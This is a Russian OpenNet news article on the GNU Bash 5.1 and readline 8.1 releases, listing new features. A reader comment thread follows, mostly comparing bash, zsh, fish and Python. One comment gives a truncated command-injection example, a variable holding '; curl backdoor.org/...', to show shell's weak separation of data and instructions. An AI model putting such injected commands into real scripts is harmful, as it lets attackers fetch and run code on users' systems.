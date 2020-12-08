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Релиз командного интерпретатора Bash 5.1

08.12.2020 11:43

После двух лет разработки опубликована новая версия командного интерпретатора GNU Bash 5.1, используемого по умолчанию в большинстве дистрибутивов Linux. Одновременно сформирован релиз библиотеки readline 8.1, применяемой в bash для организации редактирования командной строки.

Из ключевых улучшений можно отметить:

  • Переработан движок генерации псевдослучайных чисел. Добавлена переменная SRANDOM, содержащая случайное 32-разрядное число из системного генератора псевдослучайных чисел (вместо LCRNG использованы вызовы getrandom/getentropy, /dev/urandom или arc4random, в зависимости от ОС). Выдаваемая последовательность теперь не является линейной и не повторяется при идентичном следовании запросов.
  • Для ассоциативных массивов реализована поддержка составных присвоений, в которых передаётся набор из пар в формате ключ/значение ("[key]=value"). Реализовано динамическое увеличение размера хэш-таблицы в зависимости от типа данных, добавляемых в ассоциативный массив.
  • Добавлена переменная PROMPT_COMMANDS, которую можно использовать для запуска нескольких команд перед выводом приглашения командной строки.
  • В команду wait добавлена опция "-p имя переменной" для сохранения в переменной информации о PID процесса, возвращённого при выполнении "wait -n" или вызова wait без аргументов. В "wait -n" теперь допускается передача списка работ (wait будет ожидать изменения состояния любой задачи из списка).
  • Добавлены новые загружаемые встроенные команды: asort, mktemp, accept, mkfifo, csv и cut/lcut.
  • В POSIX-режиме реализована возможность замещения процесса (process substitution), при которой ввод и вывод команды обрабатывается другими командами как файл (например, "diff <(sort file1) <(sort file2)").
  • Добавлены новые параметры операторов преобразования: "U", "u" и "L" для преобразования в верхний регистр всей строки, преобразования в верхний регистр первого символа и преобразования в нижний регистр, а также параметр "K" для отображения ассоциативного массива в формате ключ/значение.
  • Для включения режима совместимости с прошлыми версиями теперь нужно использовать переменную BASH_COMPAT (через опцию compat50 установить режим совместимости с bash 5.0 не получится).
  • В Readline по умолчанию включён режим выделенной вставки (bracketed-paste), при котором извлекаемые из буфера обмена данные обрамляются escape-последовательностями ("\e[200~" и "\e[201~") для визуального выделения поступивших из буфера обмена данных. В Readline обеспечена подсветка подобных вставок, а также подсветка текста, найденного при инкрементальном и неинкрементальном поиске в истории. Расширено число команд и ситуаций, для которых подставляются метки для подсветки.
  • Readline реализовано автоматическое включение горизонтальной прокрутки на однострочных терминалах.
  • Добавлена команда rl-clear-display для очистки содержимого экрана и буфера прокрутки.
  • Возвращено старое поведение, связанное с раскрытием файлового пути при указании слов, включающих обратные слэши, но не использующих спецсимволы раскрытия маски. Как и в bash 4.4 подобные пути теперь не раскрываются (изменённое поведение Bash 5.0 соответствовало стандарту POSIX, но было отрицательно воспринято пользователями и комитет POSIX согласился изменить спецификацию). Кроме того режим GLOBIGNORE теперь игнорирует указание "." и ".." в качестве указанных в терминале компонентов пути.
  • Изменена обработка исключений (trap) при чтении данных с терминала при помощи конструкций read и select. Встроенная команда select теперь запускает trap-обработчики в случае прерывания сигналом внутреннего вызова команды read. Разрешён рекурсивный запуск обработчиков SIGINT.
  • Разрешено использование команды "read -e" с произвольными файловыми дескрипторами (read -u N).
  • Добавлена возможность связывания с уже установленной в системе библиотекой Readline, вместо встроенной версии lib/readline (для подобного связывания требуется версия Readline 8.1).
  • В команде "bind -x" добавлена поддержка определения разных привязок клавиатурных комбинаций для разных режимов редактирования и разных раскладок клавиатуры.
  • Реализована оптимизация числа форков, выполняемых при запуске команд в subshell или при помощи "bash -c". При выполнении "bash -c" статус выполнения работ теперь можно узнать командой jobs.
  • Код сопоставления по шаблону теперь использует вызов fnmatch для учёта одинаково выглядящих строк, но отличающихся по кодам символов.
  • В readline добавлена команда shell-transpose-words, использующая то же определение слов, что и в команде shell-forward-word. По умолчанию добавлены клавиатурные привязки для команд shell-forward-word, shell-backward-word, shell-transpose-words и shell-kill-word.
  • В начальном окружении командной оболочки теперь доступна переменная ARGV0, которой присвоено значение $0.
  • Добавлен оператор "test -N", определяющий время с наносекундной точностью.
  • Разрешена запись в переменную BASH_REMATCH.
  • В ulimit добавлена команда "-R" для просмотра и установки ресурса RLIMIT_RTTIME.
  • Вызов malloc на 64-разрядных системах теперь выравнивает возвращаемую память по 16 байтовой границе.
  • При выходе из командной оболочки bash теперь пытается закрыть все FIFO-каналы, независимо от того, завершены ли связанные с ними процессы.


  1. Главная ссылка к новости (https://lists.gnu.org/archive/...)
  2. OpenNews: Релиз командного интерпретатора Bash 5.0
  3. OpenNews: Выпуск командной оболочки fish 3.0
  4. OpenNews: Xonsh - командная оболочка, сочетающая Python с лучшими возможностями Bash, zsh и fish
  5. OpenNews: В Bash выявлено ещё четыре уязвимости, эксплуатируемые через переменные окружения
  6. OpenNews: Релиз командной оболочки zsh 5.1
Лицензия: CC-BY
Тип: Программы
Короткая ссылка: https://opennet.ru/54214-bash
Ключевые слова: bash, shell
При перепечатке указание ссылки на opennet.ru обязательно
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  • 1.1, MasterSlave (?), 12:03, 08/12/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –1 +/
    Народ, не вброса ради... Что всё-таки лучше для заурядного хомы: bash или zsh?
     
     
  • 2.3, Аноним (3), 12:05, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• –3 +/
    Мне лично нравится oh-my-zsh с плагинами.
     
     
  • 3.13, Аноним (13), 12:21, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    >oh-my-backdoor

    Так правильнее.

     
     
  • 4.27, Аноним (27), 12:45, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +7 +/
    Пруфы бэкдоров будут или опять пук анонима в лужу?
     
  • 2.4, Отпетый Виндузятник (?), 12:05, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• –15 +/
    PowerShell (: ну или что там сейчас ещё для 10 сделали
     
     
  • 3.5, Аноним (5), 12:07, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    cmd должно хватить всем
     
     
  • 4.11, Аноним (11), 12:17, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +3 +/
    command.com
     
  • 4.16, Аноним (16), 12:28, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Очень многие не сидят. У большинства моих знакомых венды дома нет, многим и по работе с ней пересекаться не приходится.
     
     
  • 5.19, Аноним (16), 12:31, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    Лично у меня она есть, только в виртуалке. Нужно для работы, да и игрушечки не все пока на протоне идут. В принципе cmd.exe вполне достаточно для её скриптования, павершел же ничем не удобнее баша.
     
     
  • 6.25, заминированный тапок (ok), 12:42, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    зато на Lutris идут гораздо больше, чем на протоне (и даже есть интеграция с коллекцией steam)

    а играться в виртуальной машине - ну такое...

     
     
  • 7.28, Аноним (16), 12:48, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    Да не помню, когда запускал виртуалку ради игрушечек, вроде лет 5 назад. Тогда ещё dxvk никаких не было, какие-то лютые баги лезли. Но вообще, в QEMU то с проброшенной картой лучше чем с вендой на хосте работает, в dxvk всё же процентов на 10 ниже фреймрейт.
     
     
  • 8.50, заминированный тапок (ok), 13:45, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    много возни косяков при пробросе видекарты в QEMU из личного опыта хост был с... текст свёрнут, показать
     
     
  • 9.56, Аноним (16), 14:02, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    Для хоста нужна другая карта, у меня был отдельный монитор, но вроде можно и с о... текст свёрнут, показать
     
  • 4.18, Аноним (18), 12:31, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    У меня нет окошек уже лет эдак 5 от слова совсем. До этого была XP в виртуалке для одной хитрой софтины.
     
  • 3.31, Аноним (31), 13:14, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    >ну или что там сейчас ещё для 10 сделали

    WSL2 для вас сделали. Так что вам тоже на bash переходить.

     
  • 3.35, cjayho (?), 13:22, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    ее и на венде особо не жалуют изза адских тормозов и переусложненности
     
  • 2.6, Аноним (6), 12:07, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +5 +/
    Что значит лучше? Это просто инструмент. Он либо подходит под твои задачи либо нет. Если не подходит, ищешь другой.
     
     
  • 3.39, Аноним (39), 13:23, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    Просто удобный молоток, а не розовая ржавая железка.
     
  • 2.8, Аноним (16), 12:10, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Зшизмы заточены на комфортный интерактив (и куча плагинов комплектом соответственно тоже) и баш на скрипты, в значительной мере избавленные внешних вызовов. Он легче зш, но некоторые поведение в частности с пайпами и его ридлайн довольно своеобразное. Вроде я столкнулся с несовместимыми отличиями в глобах, сетопт и хэштейблах, из-за чего от поддержки зш в качестве интерпретатора пришлось отказаться. А кроме того, зш есть не каждой системе, и баш есть везде, поэтому если и брать зш, то только "для души".
     
  • 2.9, Аноним (9), 12:12, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +5 +/
    bash, если у тебя больше одного компа
     
     
  • 3.49, Аноним (49), 13:43, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    Какая связь?
     
     
  • 4.70, Аноним (70), 14:24, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    zsh нужно устанавливать самому
     
     
  • 5.76, Аноним (49), 14:39, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    И что? На один комп поставить можно, а на второй уже неподъёмная задача?
     
  • 2.10, stargrave2 (?), 12:17, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    http://www.stargrave.org/ZSH-proscons.html
     
  • 2.22, Аноним (22), 12:32, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    Тебе скрипты писать или просто дефолтный интерпретатор? Если первое, то лучше питона или руби ты не найдёшь. Если второе — оставайся на баш и не трогай, дабы не сломалось.
     
  • 2.24, Дмитрий П. (?), 12:38, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    fish
     
  • 2.26, nomad__ (ok), 12:43, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    > Что всё-таки лучше для заурядного хомы: bash или zsh?

    bash достаточно даже разрабу (как разраб говорю). Когда тебе понадобится zsh, ты об этом узнаешь.

     
  • 2.34, Аноним (34), 13:20, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    Для скриптов bash, для командной строки fish
     
  • 2.36, лолшто (?), 13:22, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Если стратежно к вопросу подходить, то изучать следует то, что позволит твоему опыту быть более переносимым. В данном случае - это bash.
     
  • 2.37, rshadow (ok), 13:22, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Если коротко: bash есть из коробки на каждом сервере, zsh если настроить то будет удобнее.
     
     
  • 3.51, Аноним (49), 13:46, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    Не на каждом. Даже не на каждом сервере с линуксом. И bash, и zsh — это хорошо, но надо уметь пользоваться POSIX shell.
     
     
  • 4.55, 1 (??), 14:00, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    вроде в любом линаксе sh - это просто hardlink на bash
     
     
  • 5.67, Аноним (49), 14:20, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    Даже из мейнстримных дистров общего назначения — не в любом. В Debian-based и некоторых других это dash. Ежели дистр специализированный и урезанный, в нём может быть busybox с ash.
     
  • 5.68, Аноним (49), 14:20, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    И не хардлинк, а симлинк, кстати.
     
  • 5.69, aa (?), 14:24, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    нет, не в любом
     
  • 4.73, Аноним (70), 14:28, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    нет не надо
     
  • 2.40, InuYasha (??), 13:24, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• –3 +/
    Пользую zsh уже с десяток лет. ЕДИНСТВЕННОЕ, чего в нём мне не хватает - поддержки оператора "==". Но это только в скриптах.
     
  • 2.44, Аноним (44), 13:27, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    bash.org
     
  • 2.66, abu (?), 14:20, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    Программисты ставят zsh на десктоп, пожалуй, это хорошо. А на сервер ... мне лично лень городить его на каждом сервере, хватает и bash'a.
     

  • 1.17, ttakttaguri (ok), 12:30, 08/12/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    Во мне есть ubuntu 20.10, bash 5.0.17.
    Что и как надо зделать чтобы установил bash 5.1?
     
     
  • 2.20, Аноним (18), 12:32, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +4 +/
    Ничего. Жди обновления, не сри в систему.
     
  • 2.21, Аноним (18), 12:32, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Жди пакетов лучше. Либо переходи на роллинг дистры.
     
  • 2.38, Аноним (31), 13:23, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    >Во мне есть ubuntu 20.10, bash 5.0.17.

    Терминатор?

     
  • 2.48, danonimous (?), 13:40, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    Жди ебилдов.
     

  • 1.23, Аноним (39), 12:36, 08/12/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    > 5.1

    Вот она, программа здорового человека... ой, простите, человека без инвалидности!

     
     
  • 2.41, Аноним (31), 13:25, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    Ты что, против инклюзива человеков с инвалидностью?
     

  • 1.29, Аноннчик (?), 12:58, 08/12/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –1 +/
    Чем ZSH хуже Баша?
     
     
  • 2.30, Аноним (30), 13:08, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Что же у Вас тут за собрание "лучше-хуже"?
    Чем колбаса хуже сосиски?
    Разные они, вот и всё. Что больше нравится - тем и пользуйтесь.
     
  • 2.33, Ordu (ok), 13:20, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    У zsh имя нечитаемое совершенно: "зш", ну что это? Как это читать?
     
     
  • 3.42, InuYasha (??), 13:25, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    Вообще все его читают как "зэ - эс - аш".
     
     
  • 4.58, Ordu (ok), 14:05, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    > Вообще все его читают как "зэ - эс - аш".

    Ну я о том же. Вынос мозга, а не название. гэцэцэ с гэдэбэ и то лучше.

     
     
  • 5.71, IRASoldier_registered (ok), 14:26, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    >гэцэцэ

    Тяжкое наследие советской школы с повальным изучением немецкого вместо английского.

    Так что "джи-си-си".

    >гэдэбэ

    "джи-ди-би", подсказывает Кэп.

    >"зэ-эс-аш"

    Хрена два. Общепринятое произношение - z[ee]sh / z[i]sh, т.е. "зиш". Баш и зиш, да.

     
  • 3.78, Аноним (78), 14:41, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    Прочитайте-ка ssh, пожалуйста
     

  • 1.32, Аноним (32), 13:15, 08/12/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Баш вместе с линукс утилитками производительнее питона получается. И времени на код меньше уходит.
     
     
  • 2.45, InuYasha (??), 13:28, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    Только maximum дырявity, поскольку разделение данные-инструкции очень слабое - т.е. часто переменая может стать командой (если в неё запишут "; curl backdoor.org/...".
     
     
  • 3.52, Аноним (49), 13:49, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    > часто переменая может стать командой (если в неё запишут "; curl backdoor.org/...".

    Это от криворукости. Разыменование переменной вне двойных кавычек бывает нужно крайне редко и только в тех случаях, когда ты сам эту переменную определил.

     
     
  • 4.59, Аноним (16), 14:06, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    Зато eval нужен очень часто, и ничего ты с этим не сделаешь.
     
     
  • 5.74, Аноним (70), 14:30, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• –2 +/
    нет не нужен
     
     
  • 6.75, Аноним (16), 14:34, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    > нет не нужен

    Наверно твои скрипты совершенно неконфигурируемая лапша из одного харкода, тогда конечно. При определённой сложности скриптов возникает желание предоставить пользователю возможность конфигурировать части логики в своём конфигурационном файле (а заодно избавиться от необходимости постоянно править хардкод). При том хочется его не насиловать его лишний раз, так что да, очень даже нужен.

     
     
  • 7.77, Аноним (16), 14:39, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    А, ещё eval на хештейблы натравливать очень удобно. Хештейблы на порядки удобней альтернатив, особенно когда у тебя неизвестно число параметров. Держать десятки списков в памяти, чтобы отказаться от хэштейблов? Ну, удачи это потом сопровождать.
     
  • 5.79, Аноним (49), 14:42, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    > eval нужен очень часто

    Пишу много скриптов и со всей ответственностью могу сказать, что eval нужен крайне редко. Скорее всего, ты что-то не осилил и сильно усложняешь решение своих задач, если пользуешься им часто.

     
  • 2.46, Аноним (16), 13:36, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    До тех пор пока ты не начнёшь ежесекундно спамить тысячами процессов, да и с мультипоточностью пострадать придётся больше чем в питоне (там гил и гц мешают счастью).
     
     
  • 3.61, Аноним (32), 14:08, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    Для этого есть утилиты xargs и parallel, запускал больше тыщи на малине
     
     
  • 4.63, Аноним (16), 14:16, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    > Для этого есть утилиты xargs и parallel, запускал больше тыщи на малине

    Сколько тысяч процессов при этом вызывал каждый из тысячи процессов? А главное, сколько там было тредов? Когда большая часть времени исполнения уходит на паразитную нагрузку и "бесполезный" бойлерплейт (это что касается xargs и parallel), это всё же ощутимо.

     
     
  • 5.65, Аноним (32), 14:19, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    >Сколько тысяч процессов при этом вызывал каждый из тысячи процессов?

    А питон так умеет?

     
     
  • 6.72, Аноним (16), 14:27, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    >>Сколько тысяч процессов при этом вызывал каждый из тысячи процессов?
    > А питон так умеет?

    С процессами без проблем, параллелится на сотни (это то что я проверял). С тредами потолок будет раньше, совсем плохо будет если использовать pure python батарейки — там вообще не параллелится практически. Дело как раз в том, что питону не придётся нонстоп вызывать сотни-тысячи программ и ждать их завершения, он сам всё может. А структуры его куда более дружелюбны для данных, вон в шелле даже многомерного массива нет и приходится городить очень неприятные конструкции не эффективные по памяти.

     
  • 3.64, Аноним (32), 14:17, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    Ещё бывает сами утилиты поддерживают параллельность, например sort и curl.
     

  • 1.43, Аноним (43), 13:26, 08/12/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    ребят, а где можно почитать гайды по posix-shell? ну т.е чтобы писать скрипты которые будут одинаково работать и под башем, и под zsh, и под чем угодно еще
     
     
  • 2.53, Аноним (49), 13:54, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Читай стандарт, тестируй скрипты в разных шеллах (как минимум dash и ksh). Самый надёжный способ.
    Если для начального изучения, то на русском выходила книжка Кочана и Вуда, может быть, ещё найдёшь в продаже.
     
     
  • 3.54, Аноним (49), 13:59, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    > книжка Кочана и Вуда

    ISBN 978-5-9909445-3-4

     

  • 1.47, Иваня (?), 13:38, 08/12/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –1 +/
    крут, подскажите плз как накатить эту версию на убунту 18 :/
     
  • 1.57, YetAnotherOnanym (ok), 14:05, 08/12/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Понимаю, что выгляжу ретроградом, но весь этот улучшайзинг чреват обильными матюками, если в хозяйстве имеются машины с разными версиями скорлупы.
     
     
  • 2.62, Аноним (49), 14:14, 08/12/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    Бери пример с анонима выше, изучай POSIX shell.
     

  • 1.60, б.б. (?), 14:07, 08/12/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    ишь, раскомандовался
     

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